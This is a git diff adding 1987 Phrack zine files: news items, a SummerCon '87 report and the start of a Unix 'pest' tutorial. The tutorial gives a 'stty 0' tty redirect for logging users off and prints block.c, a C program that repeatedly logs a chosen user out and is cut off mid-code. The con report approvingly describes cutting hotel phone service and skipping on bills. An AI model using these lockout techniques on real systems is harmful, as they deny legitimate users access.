+     (Yeah, I suppose he AE'd a 30 sub system.  I can see it now, "To whom
+     these disks concern."
+
+^*^  Didn't IM seem to know much too little about The Caretaker?  I could
+     understand him not having the guy's last name or address, but not even
+     knowing his age or where he lives..?
+
+Here are some other things to think about.  There is an entire subboard
+dedicated to law enforcement and the local police even have an account on the
+system under the name CRIMESTOPPERS.  I wonder what they would have to say
+about codes on the bulletin board.  Keep in mind that Metalland South has no
+affiliation with Metallibashers, Inc. or Metal Communications, Inc.
+
+Please do not harass the board or its sysop(s), for it serves no purpose.  Now
+understand that this article is not definitely stating that this board is
+directly connected to any law enforcement agency, you can decide this for
+yourself.
+
+                      Article Written By >UNKNOWN USER<
+                     (An Anonymous Phrack Field Reporter)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Editorial Comments...
+~~~~~~~~~~~~~~~~~~~~~
+I just wanted to make a few comments about the above article.  >UNKNOWN USER<
+is the official handle that shall be used by anyone supplying an article, but
+wishes for his name not to be mentioned.  Its symbolic of the "anonymous user"
+function on Metal Shop Private, but it has no direct connection.
+
+We, the editors of Phrack, do not necessarily agree with any of the above
+statements and we do encourage those with opposite viewpoints to voice them.
+PWN can be used as the forum for those viewpoints, in which I shall voice no
+opinion.  One more thing, for the record, I did edit the article (with the
+author's consent) and will continue to do so to ensure that the original
+author's style will not revel their identity.
+
+:Knight Lightning
+______________________________________________________________________________
+
+Toll Fraud Trial Sets New Tone                                    June 5, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Network World
+by Josh Gonze (Staff Writer)
+
+                    "May be first jury finding for abuse"
+
+Dallas - The recent jury conviction of a Texas man for the theft and sale of
+long-distance access codes may make it easier for long-haul carriers to stem
+the tide of toll fraud, which costs the industry an estimated 500 million
+dollars a year.
+
+On May 11, 1987, a U.S. District Court jury here [in Dallas] found Dallas
+resident Jack Brewer guilty on two counts each of trafficking and possession
+of telephone access codes stolen from Texas National Telecommunications Inc.
+(TNT), a Texas long-distance carrier.  Brewer was charged under a section of
+the federal COMPREHENSIVE CRIME CONTROL ACT of 1984.
+
+Sources close to the case said Brewer may be the first person to be convicted
+by a jury for toll fraud in the United States.  The case is also seen as
+important because it indicates growing recognition of toll fraud as a serious
+crime.
+
+Brewer was selling the stolen codes, which telephone callers use to access
+long-distance circuits of carriers other than AT&T and which those carriers
+use for billing, says Terry K. Ray, the Assistant U.S. Attorney who prosecuted
+Brewer.  TNT officials said use of the stolen codes cost the company $30,000.
+Ray said he met with representatives of MCI Communications Corp. last week to
+discuss the investigative techniques used to apprehend Brewer and legal
+methods used to win the conviction.  Brewer will be sentenced by a judge on
+June 4 [Yeah the story is a little old, so what], and faces a maximum sentence
+of 50 years imprisonment and a $1 million fine.
+
+Toll fraud places a heavy financial burden on MCI and other carriers.  Neither
+MCI or AT&T would divulge what toll fraud costs them, but U.S. Sprint
+Communications Co. said fraudulent use of access codes lowered its
+first-quarter 1987 revenue by $19 million.
+
+Brewer was apprehended through a sting operation conducted with the help of
+TNT, Southwestern Bell Corp., and the U.S. Secret Service.  Southwestern Bell
+monitored Brewer's private telephone as he dialed numbers sequentially in a
+trial-and-error attempt to obtain active access numbers.  The Regional Bell
+Holding Company kept a list of the working access codes obtained by Brewer.
+Secret Service agents then contacted Brewer, posing as buyers of access
+numbers.  For $3,000, Brewer sold them a list of 15 numbers, which matched the
+list, made by the RBC [Just a tad greedy wasn't he?].
+
+MCI has joined with AT&T, U.S. Sprint and some smaller carriers to form the
+Communications Fraud Control Association (CFCA).  Rami Abuhamdeh, executive
+director of Tysons Corner, a Virginia based group, said there have been
+several convictions for toll fraud to date, but those cases were decided by
+judges, not juries.
+
+A number of federal and state statues apply in stolen code cases, depending on
+how and when the offender defrauds the carrier, Abuhamdeh said.  Gaston Sigur,
+a lawyer for exchanges, they will faze out code numbers as a way of accessing
+long-distance circuits and the level of toll fraud will decline.
+
+                           Thanks to Jester Sluggo
+                      Typed for PWN by Knight Lightning
+______________________________________________________________________________
+
+PWN Quicknotes
+~~~~~~~~~~~~~~
+A guy who was involved in the California area phreak/pirate organization,
+known as The Duplicator, was reported as being killed in a plane crash.
+                     Info by Sir Francis Drake (3/31/87)
+------------------------------------------------------------------------------
+Doc Holiday was busted for hacking a COSMOS system that was local to him.
+Apparently, he dialed direct and the CO most likely had CLID.         (4/2/87)
+------------------------------------------------------------------------------
+KEN is working on version 3.0 of Forum-PC, and there are rumors that it may be
+public domain.
+------------------------------------------------------------------------------
+The Broadway Show BBS, once known as The Radio Station, will be returning to
+the 212 NPA.  Please contact Broadway Hacker for details.
+                  Information From Broadway Hacker (4/16/87)
+------------------------------------------------------------------------------
+The rumor going around on Pirate-80 (P-80) that The Lineman is a fed should be
+disregarded as The Lineman in question lives in the western part of the nation
+and not the famous sysop of Atlantis.   Information From The Lineman (4/20/87)
+------------------------------------------------------------------------------
+Special Notice:  As of Phrack XVI, Lucifer 666 will become the author of
+Phrack World News.  Please send any news, stories or articles to him.  I will
+be mildly active, but only for special reports or editing.
+
+                     Knight Lightning   -   June 5, 1987
+______________________________________________________________________________
diff --git a/phrack14/9.txt b/phrack14/9.txt
new file mode 100644
index 0000000..ff3d638
--- /dev/null
+++ b/phrack14/9.txt
@@ -0,0 +1,430 @@
+          PWN ^*^ PWN ^*^ PWN { SummerCon '87 } PWN ^*^ PWN ^*^ PWN
+          ^*^                                                   ^*^
+          PWN                Phrack World News                  PWN
+          ^*^                   Issue XIV/2                     ^*^
+          PWN                                                   PWN
+          ^*^               "SummerCon Strikes"                 ^*^
+          PWN                                                   PWN
+          ^*^          Created, Written, and Edited             ^*^
+          PWN               by Knight Lightning                 PWN
+          ^*^                                                   ^*^
+          PWN ^*^ PWN ^*^ PWN { SummerCon '87 } PWN ^*^ PWN ^*^ PWN
+
+Welcome to Phrack World News Issue XIV/2.  This issue features the exclusive
+coverage of SummerCon '87, which took place in St. Louis, Missouri during the
+weekend of June 19-21, 1987.  Before we get to the bulk of the issue I'd like
+to make a note that most of the people who originally claimed that they would
+attend did not show up, but this didn't stop us from having a great time. -KL
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+PreCon'87; Tuc                                           Sunday, June 14, 1987
+~~~~~~~~~~~~~~
+It all started Sunday with the arrival of Tuc from New York.  He checked in at
+the Executive International Best Western and then later went to visit the
+Volkswagon Car exhibit that was currently appearing in St. Louis at the
+National Museum Of Transportation.
+
+Taran King and Knight Lightning went to meet Tuc at the hotel unaware that he
+had not yet returned from his visit.  In the meantime they contacted several
+other associates to learn more about other guest's plans of arrival.
+
+Sometime later, Tuc returned to the hotel and fell for a trick pulled by
+Knight Lightning and opened the door to his room.  From here, PreCon'87 began
+and before too long Forest Ranger joined KL and TK.  After some more
+greetings, Tuc unveiled some of his surprises including a few of his business
+cards.
+
+The gathering broke up for a few hours and then regrouped (with the addition
+of Cheap Shades) back at the hotel.  From there, Forest Ranger led the rest of
+us on a trek into Illinois (where they sell alcohol on Sundays).  We finally
+reached a place called "Fast Eddie's," which served not only as a liquor
+store, but as a bar and whorehouse as well.  Tuc and FR made their purchase
+and the party left for the hotel.
+
+Things remained pretty calm for a while, as we contented ourselves with the
+consumption of alcoholic beverages.  However, as the night lingered on, we
+became restless and loud.  It wasn't long until lawn furniture started to
+disappear from the hotel's pool patio and this is when we received our first
+call from the hotel desk.  Soon afterwards, we decided that is was time to eat
+and so we sent out for pizza.
+
+Now, although we tried to keep the noise level down, apparently there were
+still complaints about us.  About 27 minutes after we ordered the pizza, we
+received a visit from FR's sister-in-law who brought us a warning.  "Get the
+hell out of here, the police are on their way!"  That's all we needed to hear.
+Beer cans were grabbed and we were running for the door, when the hotel
+manager and security arrived.  We explained that we were leaving and ran down
+the hallway.  All of the sudden, the Domino's Pizza deliver man shows up.  FR
+yelled, "Yo, Domino's dude.  If you want to get paid, come down here!"  There
+was no reaction.  "Hey, you can deliver it to us here now or to jail, and then
+you won't get a tip."  He finally got the point.
+
+We grabbed the pizza and headed for a field north of Lambert Field (St. Louis
+International Airport).  The place was known as the PVA (Private Viewing
+Area), but FR informed us that it was really a PFA (Private Fucking Area) as
+we noticed when we arrived.  However, we were content with eating our pizza
+and drinking what was left of the beer.  The hotel tried to get Tuc to pay for
+the room next door to his because the occupant complained that he didn't get
+any sleep.  Tuc refused and checked out of the Best Western.
+______________________________________________________________________________
+
+PreCon'87; The Omni International Hotel                Thursday, June 18, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+This event was hardly as eventful as the previous one, but at least I can fill
+in a few blank days.  Monday, June 15, 1987, we all saw the movie "The Witches
+of Eastwick" and visited North West Plaza.  Tuesday, June 16, 1987, I don't
+know about because I wasn't there.  Wednesday, June 17, 1987, KL, TK, and Tuc
+visited Union Station (a luxurious shopping mall) and Tuc picked up souvenirs
+for friends back home.
+
+On Thursday we had several guests arrive.  Dan The Operator (a real geek)
+arrived the earliest and Lucifer 666 and Synthetic Slug arrived a little later
+(together).  Excluding Cheap Shades at the time, we all converged at Taran's
+house where the excited crowd wanted to see Metal Shop Private.  Sadly though,
+a disassembled shell was all that remained.  It wasn't long before we became
+bored and left for the hotel.  L666 and SS got a room and we killed the rest
+of the afternoon at North West Plaza. Afterwards we began to party it up in
+the room while watching TV.
+
+Some hours later, we received a call from Bill From RNOC, who was traveling
+with Ninja NYC.  They were at The Omni International Hotel, downtown and
+adjoining to Union Station.  The Omni is one the most expensive hotels in the
+city and we were all anxious to see it.  KL, TK, Dan The Operator, and Tuc
+left to go visit Bill and Ninja.
+
+After some misadventures in downtown St. Louis, we arrived at The Omni, which
+was a pretty secure building.  The elevators required a room key to be
+operated.  It seems kinda silly though when you consider that the stairs
+didn't.  So up we went to the third floor where Bill and Ninja were actually
+staying.
+
+The rooms at The Omni aren't a whole lot bigger than at Best Western, but they
+are quite a bit nicer.  They have a TV and a phone in the bathroom.  The main
+TV is remote control and gives you a billing readout on channel 3.  It was
+different.
+
+Bill came well prepared for the Con, he had stacks of old and new issues of
+2600 Magazine and other propaganda and material.  He had several other
+interesting items as well including his mysterious notebooks that never left
+his sight.  However, the most intriguing item that he had with him was his
+"bible."  "Engineering and Operations in the Bell System" published by AT&T
+Bell Laboratories.  You can guess what was inside.
+
+So we all talked for a while and then said our goodbyes.  The rest of the
+evening was for the most part uneventful for us, however, back at Best
+Western, Forest Ranger was lighting everything on fire and L666 attempted
+(unsuccessfully) to breath fire.  I guess he wanted to live up to his name.
+SummerCon '87 was about to begin.
+______________________________________________________________________________
+
+SummerCon '87; The Beginning                     Friday Morning, June 19, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+This was the day we had been waiting for.  Dan The Operator had shared a room
+with Tuc (and he still hasn't paid his share) and Bill From RNOC and Ninja NYC
+got a room at the Best Western.  Everyone soon gathered in Bill's room and
+decided to order pizza.
+
+So we called Pizza Hut, which was just down the road and Bill was very
+surprised to discover that they did not have "BIG Igloo Jugs."  After
+harassing the lady on the phone for a while, Tuc, TK, KL, Shades, and Dan left
+to go pick up the pizza.  We didn't know Dan was taping us, but that story
+will be told later.  We messed around at Pizza Hut for a while and then headed
+back to the hotel.  On the way we had a drag race with some guy who thought he
+had a cool car, we won.
+
+It wasn't much longer until Sir Francis Drake arrived bearing surprises.  With
+him was Dr. Strangelamb (named for Dr. Stranglove, who wasn't too happy about
+it), a small stuffed black sheep that makes a "baa" sound when turned over.
+Lucifer 666 had a lot of fun at the Con playing with it.  SFD also had several
+pictures of Oryan QUEST, his car, and Aiken Drum.  As far as QUEST's pictures
+go, well lets just say that The Executioner's file in Phrack 13 was totally
+correct.
+
+While back at the hotel, we had some problems with the management.  They
+didn't appreciate our attempts at putting up signs in the lobby for SummerCon
+people. We worked something out, but on a nearby payphone was perhaps the
+strangest person we encountered the whole weekend.  It was some weird lady who
+barked and scream and kicked the wall, while on the phone.  FR was on the
+phone next to her and she screamed the word "COCKSUCKER!"  He looked at her
+and she said "My son-in-law, what an asshole."  FR's response was, "Uh yeah, I
+think I know some people like that."
+
+We relaxed for a while back in Bill's room (We couldn't stand to stay in
+L666's room because of the lingering smell of Synthetic Slug's shoes).  As we
+became bored, things started to be taken apart.  Like the TV, phone, and the
+internal speaker system in the room.  Throughout all of this, Dan The Operator
+had been taping us, but again that will be explained later.
+______________________________________________________________________________
+
+SummerCon '87; Lets Party!             Friday Afternoon-Evening, June 19, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+Lex Luthor and The Leftist arrived at St. Louis Center and called for further
+directions.  After a long and tiring ordeal, they finally learned how to reach
+us.  Unfortunately it was rush hour and it would take them some time.  We
+killed an hour and before long they joined us at Best Western.
+
+After introductions were made, Tuc called Lex out into the hall, and then they
+in turn called me, Taran King, and Bill From RNOC as well.  The topic of
+discussion was Dan The Operator who had hinted earlier that he was going to
+get a picture of Lex Luthor, without his knowledge.  Less than 3 minutes
+later, Ninja NYC followed by Dan The Operator (tape recorder on) sneaked out
+the window and tried to reenter the hallway undetected.  Ninja had no way of
+knowing what we were discussing and thus allowed Dan to come with.  Suddenly
+we all started to run towards Dan with the intention of beating the hell out
+of him.  However, he sneaked back into the room through the window.
+
+Once the excitement was over we headed out to dinner.  It was mostly
+uneventful, except for the conversations on the way.  I don't know what went
+on in Tuc's car, but in mine we discussed Dan.  We split into two groups, one
+went to Imo's (a pizza joint) and the rest of us (Bill From RNOC, Ninja NYC,
+Lex Luthor, Tuc, The Leftist, and myself) went to a regular sit-down
+restaurant. We discussed all sorts of different things both phreak and
+non-phreak related, but again the main topic was Dan.
+
+Soon we were joined by the others and we left to go back to Best Western where
+we found The Disk Jockey, LOKI, and Control C.  These guys came extremely well
+prepared.  They rented a station wagon somewhere in Michigan and filed it with
+a cooler (you can guess what was inside that), tons of magazines, manuals,
+electrical equipment, a mobile phone transmitter/receiver, and Control C's IBM
+PC, hard disk drive, and modem.
+
+After which, Phantom Phreaker, Doom Prophet, Data Line, Forest Ranger, Bit
+Master, and another friend of FR's showed up.  SummerCon '87 had begun.  It
+was just a big party from then on, with the regular hotel party actions.  Data
+Line had brought lots of TeleComputist back issues to the TeleComputist room
+and was distributing them around.
+
+At different times during the night, the elevators were jammed and several
+people at the Con decided to go up on the roof.  However, many of them also
+decided to search for the hotel's PBX system.  Somewhere along the way,
+Control C, The Leftist, Lucifer 666, Cheap Shades, and I found ourselves
+locked inside the staircase of the main building.
+
+The doors only opened from the outside, except at the bottom.  Unfortunately
+opening the door at the bottom would result in sounding the fire alarm in the
+building.  This was bad news because that was the last thing we needed.  Even
+if it wasn't our fault there would be complications.  So the five of us split
+up and each took a door to bang on.  The hotel was mostly empty in these
+areas, but I knew that there were people on floor ten.  So Lucifer 666 and I
+ran up ten flights of stairs and pounded on the door until we finally got a
+response, several in fact and many of the people weren't happy (it was after
+11 PM). Before too long we had rounded up the rest of our crew and made it
+back to the rooms just in time to say good-bye to Phantom Phreaker and Doom
+Prophet who were leaving for home (they would return for the Con tomorrow).
+
+Several more hours of partying commenced, as well as hourly pizza deliveries.
+Everyone was having a great time, however as the night dragged on, the concern
+regarding Dan The Operator and his camera (and other things) grew.  He had
+been found already talking to John Maxfield once that night on the payphones
+and had been caught asking questions about several of the people at the Con.
+It wasn't long before the word "TeleTrial" began to be chanted by most of the
+Con-goers.
+
+The interested parties gathered in the TeleComputist room and the
+interrogation began.  Dan The Operator's explanations of events that evening
+had been proven false as they contradicted each other.  The next step was to
+search his belongings.  Forest Ranger led the prosecution and started through
+Dan's notebooks.  In it was information about several of the people at the con
+and Taran King's and Forest Ranger's addresses (Dan had been to both their
+homes where he could have found the addresses).  There were also phone numbers
+belonging to people that several Con-goers called.  Obviously Dan had been
+keeping his eyes and ears open in order to gather information.
+
+Dan became worried when FR wanted to search his suitcase and they stepped
+outside for a moment.  For some reason Dan was worried about us seeing his
+dirty underwear.  Now why would he become so frantic about dirty underwear
+unless there was something especially dirty about it.  You can come to your
+own conclusions about this one.  Anyway, Dan brought all sorts of electrical
+equipment with him, including welding equipment and light switches and things.
+The most hilarious item that he brought was Garfield the cat, a stuffed animal
+that he slept with.
+
+The camera, tape recorder, film, and tapes were confiscated for later
+examining and being that is was around 4 AM, everyone decided to get some
+sleep.
+______________________________________________________________________________
+
+SummerCon '87; Conference Time                         Saturday, June 20, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taran King, Cheap Shades, and I arrived back at Best Western around 12 AM.
+Most of the other Con people were either still asleep or out for breakfast.
+By 12:45 almost everyone was back and we proceeded to the "Kitty Hawk Room."
+
+Some of the clothing worn at the Con reflected the person's interests.
+
+                    Bill From RNOC - Computer Hacker (pic)
+                    Lex Luthor     - VAX/VMS Rules!
+                    Tuc            - UNIX Bozo
+
+The Con started off rather slow as no one really knew how to get it started.
+Finally Lex Luthor decided to discuss the current rumors about the BBS
+decline.  From there the topics included;
+
+Bulletin Boards
+Busts (Texas, Virginia, New York)
+Fiber Optics
+Automatic Number Identification (ANI)
+REMOBS
+Laws
+Handles
+Groups
+Broadway Hacker
+Methods of blowing 2600 Hertz
+SCCS
+4TELs
+800 CLID
+
+Later, Bill From RNOC told some stories about his exploits and proceeded to
+draw diagrams of whatever came to mind.  Phantom Phreaker and Doom Prophet
+were upset that no one wanted to discuss CAMA.
+
+In the meantime, I noticed that Dan The Operator had disappeared.  Forest
+Ranger and I investigated only to discover that the tapes had disappeared as
+well.  We caught up with Dan later and discovered that the tapes were now in
+Control C's rented station wagon.  LOKI let me in and I took the cassette I
+had been looking for and a roll of film.  The tape had all of my SummerCon
+article memos on it and this article is partially the result.  We didn't know
+about side B, but more on that later.
+
+After the Con, Taran King, Control C, Lucifer 666, Bill From RNOC, and I
+headed out to my house where we had some serious copying to do.  Control C
+brought his computer and we began to copy Metal Shop Private on to his hard
+disk drive. While this was going on, Lucifer was receiving a copy of my very
+own PWN software to aid him when he takes over with issue XVI.  I left the
+cassette and film at my house, its a pity I didn't play it right away because
+this article would have had a very different end.
+
+Anyway, we finished up and then headed to Chesterfield Mall, a nearby shopping
+center.  From there we proceeded to the local CO and recovered some
+interesting artifacts.  Our next stop was to pick up some hardware that we
+needed and then more trashing.  We returned to Best Western and learned that
+Lex Luthor and The Leftist had left due to Leftist's tight schedule.
+
+The rest of the afternoon was mostly uneventful.  Lots of rain and not much to
+do.  As night approached, the party part of the Con began to restart.  Several
+of us got bored with this and decided to explore parts of the hotel.  We found
+a Navy wedding reception and decided to take in the food.  The management
+didn't approve and we were bounced.  So then we decided to take a look at the
+telephone wiring boxes in the hallways of the buildings.  The problem was that
+to open them you had to rip out part of the wall.  Nevertheless, things have a
+way of happening and the residents of several wings of the hotel found
+themselves without phone service.
+
+The management didn't like what was happening at all and called the police to
+investigate.  They spotted several of us running around the hotel and it was a
+mad dash back to the rooms for cover.  LOKI was spotted going through an open
+window into Lucifer 666's room and the police decided to investigate it more
+closely.  After an hour of panic and excitement, things cooled down and most
+of the people in Lucifer 666's room either went to sleep or were playing with
+Control C's computer and logging on to Metal Shop Private.
+
+We were bored and so Ninja NYC, Bill From RNOC, Taran King, Tuc, and I decided
+to go throw ice on Dan The Operator.  We ran down the hall and banged on
+L666's door.  Suddenly one of the hotel managers appeared and threatened us
+that if we didn't go to our rooms and keep quiet he would call the police.  We
+left the hall and went to the back parking lot.  Ninja started a wheel rolling
+towards the building and we all knew what the result would be <CRASH!>.
+
+Before it hit we ran at full speed around to the front of the hotel where we
+were greeted by a hefty officer of the Bridgeton Police Department.  He was
+sort of leaning on his car facing us.  It was so eerie because it almost
+seemed as though he knew we were coming and was waiting for us.  We slowed
+down considerably until he said, "Run to me boys."  No one really reacted
+until he said it again, "C'mon run to me boys."  Ten seconds later he was
+joined by the asshole manager that had yelled at us not more than 60 seconds
+ago.  "How old are you!?" he asked checking for curfew violations.  Our
+replies varied from 17 to 21.  "Where are you from!?"  Bill and Tuc replied
+New York, the rest of us kept quiet.  "Lets see some room keys!"  We showed
+him two keys and then he looked at the asshole manager and said, "They belong
+here."  "Why are you outside, what are you doing!"  Taran replied, "Going to
+get something to eat, is that okay mister!?"
+
+Our car was parked next to his and we took off for a while.  He tried to
+follow us, but we quickly left his jurisdiction.  While we were out we found
+the home of Bigfoot (the truck).  We messed around there for a while and then
+returned to Best Western and walked around some of the vacant floors of the
+hotel.
+
+The only other interesting activity we did that evening was a 3 AM trip to a
+24 hour food store.  Bill From RNOC, Taran King, Tuc, Sir Francis Drake, and I
+went to a Super Schnucks and messed around there.  It was huge and we almost
+lost SFD.  After making a few purchases, we went back to the home of Bigfoot
+and Taran decided to play bumper car with some of the super huge tires in the
+parking lot.  We returned to the hotel for the last time and found Ninja NYC
+on the phone with L666's current girlfriend.  We harassed her for a while and
+then I fell asleep.  Taran and a few others made a few other trips around town
+and woke me up at about 6 AM Sunday morning.
+______________________________________________________________________________
+
+SummerCon '87; Good-bye & Good Luck!                     Sunday, June 21, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Forest Ranger dropped by early to take Bill From RNOC and Ninja NYC to the
+train station, Taran King went along for the ride.  It would be over 24 hours
+before they got home.  Tuc took Dan The Operator to the airport around 7 AM
+and at about 8 AM Cheap Shades and I dropped off Sir Francis Drake who was on
+his way to Boston.  I took Cheap Shades home and then went back to my house to
+crash out.
+
+Forest Ranger went back to Best Western to find everyone in Bill's room.  Bill
+and Ninja never checked out because of an excessively large phone bill that
+they didn't want to pay, so everyone took advantage of this situation and
+started to to order room service.  Sometime later a bellboy appeared to
+collect the money due for the room service and everyone left leaving Forest
+Ranger behind.  "Hey, I'll be right back, I left my wallet in my car, hold on
+a sec, okay?"  FR never returned and everyone went home except for Tuc who was
+at another hotel (He took a room at Ben Franklin because he wasn't welcome at
+Best Western after what happened the Sunday previous).
+
+Around 10 AM, I decided that I didn't feel like sleeping and started playing
+the tape only to find several unauthorized recordings.  Dan had been taping us
+all throughout the Con, but the interesting parts came later.  There was part
+of an Alliance teleconference on the tape where Dan tried to act like he was
+some real important person (what a joke!) and a botched up social engineering
+job.  The BIG shocker hit when I flipped the tape over to discover 45 minutes
+of a conversation with John Maxfield aka Cable Pair of BoardScan.  I won't go
+into details about the conversations right now, but the scary part is that the
+tape ends before the phone call does.  In other words we don't know exactly
+how much information was passed, but we do know that it has been an ongoing
+thing, perhaps for months. An actual overview and possible transcript of these
+conversations will appear in PWN XV.
+
+I was in shock.  I couldn't believe what I was hearing!  It especially hurt
+when information was passed about people that I actually knew and had met.  If
+only I had played that tape the night before, this would be a different story
+entirely.  I didn't know exactly what to do.  I had stopped calling out, but I
+was willing to pay for a few calls to spread the news.  The only problem was
+that the majority of the people I wanted to contact were still en route home
+or unreachable.  I finally was able to reach Tuc who was still in St. Louis.
+He dropped by and I played him the tape.  Since then, Taran King and Forest
+Ranger have also heard most of the tape and preliminary investigations have
+begun.
+
+We have discovered some information linking Dan The Operator to the FBI, but
+more on that next issue.
+______________________________________________________________________________
+
+PWN SummerCon '87 Quicknotes
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SummerCon Promotional Posters were created by Lucifer 666.  They featured many
+trademarks of well known telecommunications companies as well as different
+plans and schematics for boxes and other equipment.
+------------------------------------------------------------------------------
+The Southern Baptists were in town during the week for some National
+convention of their own.
+------------------------------------------------------------------------------
+Johnny Rotten was supposed to appear at SummerCon '87 and called to confirm
+his plans on Friday Evening, June 19, 1987.  He never appeared.
+------------------------------------------------------------------------------
+The full guest list of SummerCon '87 includes;
+
+  Bill From RNOC / Bit Master / Cheap Shades / Control C / Dan The Operator
+   Data Line / Doom Prophet / Forest Ranger / Knight Lightning / Lex Luthor
+    LOKI / Lucifer 666 / Ninja NYC / Phantom Phreaker / Sir Francis Drake
+      Synthetic Slug / Taran King / The Disk Jockey / The Leftist / Tuc
+
+In closing, SummerCon '87 was a fantastic success and anyone who missed it,
+missed out!  See you next year at SummerCon '88.  Plans are already being
+made!
+
+:Knight Lightning
+______________________________________________________________________________
+
diff --git a/phrack15/1.txt b/phrack15/1.txt
new file mode 100644
index 0000000..ca783a9
--- /dev/null
+++ b/phrack15/1.txt
@@ -0,0 +1,46 @@
+                ===== Phrack Magazine presents Phrack 15 =====
+
+                  ===== File 1 of 8 : Phrack 15 Intro =====
+
+
+
+8/7/87
+
+
+        So, did you miss us?  Yes, Phrack is back!  Phrack Magazine's beloved
+founders, Taran King and Knight Lightning, have gone off to college, and the
+recent busts (summarized completely in this month's Phrack World News) have
+made it difficult to keep the magazine going.
+
+        TK and KL have put the editorship of Phrack in the hands of Elric of
+Imrryr and Sir Francis Drake.  SFD is primarily responsible for PWN.  As of
+yet we have no 'Official Phrack BBS.'
+
+        Due to various obstacles, the first issue under the new editorship is
+rather small.  Fortunately, however, the overall quality of the files
+presented is among the highest ever.  We've managed to keep references to
+Oryan QUEST down to as little as possible and we've resisted the temptation to
+include some second-rate files as "fillers."  Naturally, we're still looking
+for excellent, unpublished phreak/hack/pyro/anarchy files to publish in Phrack
+XVI and beyond.  If you have an article, we'd like to see it! Get in touch
+with SFD or Elric when your file is ready for submission.
+
+                                          -- Shooting Shark
+                                             Contributing Editor
+Note:  For now you can contact Phrack Inc. at:
+Lunatic Labs: 415-278-7421 300/1200 (Sir Francis Drake or Elric of Imrryr)
+Free World:   301-668-7657 300/1200/2400/9600 (Disk Jockey)
+
+
+Phrack XV Table of Contents
+===========================
+
+15-1.   Phrack XV Intro by Shooting Shark                (2K)
+15-2.   More Stupid Unix Tricks by Shooting Shark        (10K)
+15-3.   Making Free Local Payfone Calls by Killer Smurf  (7K)
+15-4.   Advanced Carding XIV by The Disk Jockey          (12K)
+15-5.   Gelled Flame Fuels by Elric of Imrryr            (12K)
+15-6.   PWN I:   The Scoop on Dan The Operator by KL     (19K)
+15-7.   PWN II:  The July Busts by Knight Lightning      (21K)
+15-8.   PWN III: The Affidavit by SFD                    (6K)
+
diff --git a/phrack15/2.txt b/phrack15/2.txt
new file mode 100644
index 0000000..b211320
--- /dev/null
+++ b/phrack15/2.txt
@@ -0,0 +1,263 @@
+                ===== Phrack Magazine presents Phrack 15 =====
+
+                           ===== File 2 of 8 =====
+
+I thought I had written everything there is to write about the Unix operating
+system until I was recently asked to put out yet another file... so I said
+"I'll try, but don't publish my file along with an article by The Radical
+Rocker this time!"  These demands having been met, I booted up the PC and
+threw together...
+
+                 --- ---- ---- ------ ------ -- -- ---- -----
+               % Yet Even More Stupid Things to Do With Unix! $
+                 --- ---- ---- ------ ------ -- -- ---- -----
+
+                              By Shooting Shark.
+                          Submitted August 26, 1987
+
+
+These two topics are methods of annoying other users of the system and
+generally being a pest.  But would you want to see a file on *constructive*
+things to do with Unix?  Didn't think so...
+
+
+--  ------- ----- --- --- ------
+1.  Keeping Users Off The System
+--  ------- ----- --- --- ------
+
+Now, we all know by now how to log users off (one way is to redirect an 'stty
+0' command to their tty) but unless you have root privs, this will not work
+when a user has set 'mesg n' and prevented other users from writing to their
+terminal.  But even users who have a 'mesg n' command in their .login (or
+.profile or .cshrc) file still have a window of vulnerability, the time
+between login and the locking of their terminal.  I designed the following
+program, block.c, to take advantage of this fact.
+
+To get this source running on your favorite Unix system, upload it, call it
+'block.c', and type the following at the % or $ prompt:
+
+cc -o block block.c
+
+once you've compiled it successfully, it is invoked like so:
+
+block username [&]
+
+The & is optional and recommended - it runs the program in the background,
+thus letting you do other things while it's at work.
+
+If the user specified is logged in at present, it immediately logs them out
+(if possible) and waits for them to log in.  If they aren't logged in, it
+starts waiting for them.  If the user is presently logged in but has their
+messages off, you'll have to wait until they've logged out to start the thing
+going.
+
+Block is essentially an endless loop : it keeps checking for the occurrence of
+the username in /etc/utmp.  When it finds it, it immediately logs them out and
+continues.  If for some reason the logout attempt fails, the program aborts.
+Normally this won't happen - the program is very quick when run unmodified.
+However, to get such performance, it runs in a very tight loop and will eat up
+a lot of CPU time.  Notice that near the end of the program there is the line:
+
+/*sleep(SLEEP)   */
+
+the /* and */ are comment delimiters - right now the line is commented out.
+If you remove the comments and re-compile the program, it will then 'go to
+sleep' for the number of seconds defined in SLEEP (default is 5) at the end of
+every loop.  This will save the system load but will slightly decrease the
+odds of catching the user during their 'window of vulnerability.'
+
+If you have a chance to run this program at a computer lab at a school or
+somewhere similar, run this program on a friend (or an enemy) and watch the
+reaction on their face when they repeatedly try to log in and are logged out
+before they can do *anything*.  It is quite humorous.  This program is also
+quite nasty and can make you a lot of enemies!
+
+caveat #1:  note that if you run the program on yourself, you will be logged
+out, the program will continue to run (depending on the shell you're under)
+and you'll have locked yourself out of the system - so don't do this!
+
+caveat #2:  I wrote this under OSx version 4.0, which is a licensed version of
+Unix which implements 4.3bsd and AT&T sysV.  No guarantees that it will work
+on your system.
+
+caveat #3:  If you run this program in background, don't forget to kill it
+when you're done with it!  (when you invoke it with '&', the shell will give
+you a job number, such as '[2] 90125'.  If you want to kill it later in the
+same login session, type 'kill %2'.  If you log in later and want to kill it,
+type 'kill 90125'.  Just read the man page on the kill command if you need any
+help...
+
+----- cut here -----
+
+/* block.c -- prevent a user from logging in
+ * by Shooting Shark
+ * usage : block username [&]
+ * I suggest you run this in background.
+ */
+
+#include <stdio.h>
+#include <utmp.h>
+#include <ctype.h>
+#include <termio.h>
+#include <fcntl.h>
+
+#define W_OK2
+#define SLEEP5
+#define UTMP"/etc/utmp"
+#define TTY_PRE "/dev/"
+
+main(ac,av)
+int ac;
+char *av[];
+{
+int target, fp, open();
+struct utmpuser;
+struct termio*opts;
+char buf[30], buf2[50];
+
+if (ac != 2) {
+printf("usage : %s username\n",av[0]);
+exit(-1);
+}
+
+
+for (;;) {
+
+if ((fp = open(UTMP,0)) == -1) {
+printf("fatal error!  cannot open %s.\n",UTMP);
+exit(-1);
